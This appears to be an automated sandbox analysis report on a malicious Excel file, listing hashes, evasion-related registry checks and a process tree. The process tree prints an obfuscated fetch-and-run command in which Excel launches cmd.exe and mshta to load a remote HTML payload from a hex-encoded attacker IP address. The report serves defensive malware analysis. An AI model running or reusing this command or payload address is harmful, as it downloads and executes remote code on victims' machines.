Analysis
-
max time kernel
133s -
max time network
136s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20-11-2024 16:59
Behavioral task
behavioral1
Sample
36af992ab016a84758ce4fafe17e0d2d0da4bf545d684398cb25ba986a57c309.xls
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
36af992ab016a84758ce4fafe17e0d2d0da4bf545d684398cb25ba986a57c309.xls
Resource
win10v2004-20241007-en
General
-
Target
36af992ab016a84758ce4fafe17e0d2d0da4bf545d684398cb25ba986a57c309.xls
-
Size
71KB
-
MD5
4656b408481f07213f982e8dd11c457f
-
SHA1
c5ceb427a39a39c2741131c3f872fb0265aaf6f0
-
SHA256
36af992ab016a84758ce4fafe17e0d2d0da4bf545d684398cb25ba986a57c309
-
SHA512
f960fcdd27dab8a3f86a26211f6ba823075993edbc4e9c5600a8731381612cbd1e1dd422faebb34819599b67f87805beed0c70d400c5d4d1f25c4add41532fab
-
SSDEEP
1536:bpEk3hbdlylKsgqopeJBWhZFGkE+cL2NdA8eXZiozeOgXVZKyaZpvyR1kZkJvU+:bCk3hbdlylKsgqopeJBWhZFGkE+cL2Nr
Malware Config
Extracted
http://185.7.214.7/fer/fe2.html
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4048 4988 cmd.exe 82 -
Blocklisted process makes network request 1 IoCs
flow pid Process 18 2300 mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4988 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4988 EXCEL.EXE 4988 EXCEL.EXE 4988 EXCEL.EXE 4988 EXCEL.EXE 4988 EXCEL.EXE 4988 EXCEL.EXE 4988 EXCEL.EXE 4988 EXCEL.EXE 4988 EXCEL.EXE 4988 EXCEL.EXE 4988 EXCEL.EXE 4988 EXCEL.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4988 wrote to memory of 4048 4988 EXCEL.EXE 84 PID 4988 wrote to memory of 4048 4988 EXCEL.EXE 84 PID 4048 wrote to memory of 2300 4048 cmd.exe 87 PID 4048 wrote to memory of 2300 4048 cmd.exe 87
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\36af992ab016a84758ce4fafe17e0d2d0da4bf545d684398cb25ba986a57c309.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4988 -
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe2.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4048 -
C:\Windows\system32\mshta.exemshta http://0xb907d607/fer/fe2.html3⤵
- Blocklisted process makes network request
PID:2300
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize1KB
MD5954f606462796ce1f9e4afc371e5efc9
SHA1db61cb681a3f9eaf42d78df230b84a47e1829167
SHA256b87b9be8b2a33923b0a81573f88ec5341671b23b7764fe8f0884abe592c12ee8
SHA5126f6878c255fc64800fad7d9cc4784fe6baf1da84da1a475ac010704608acff1980d0a196bbc4e5a29a376d730cd935726c7fe18943e12630966c920d1f6516e6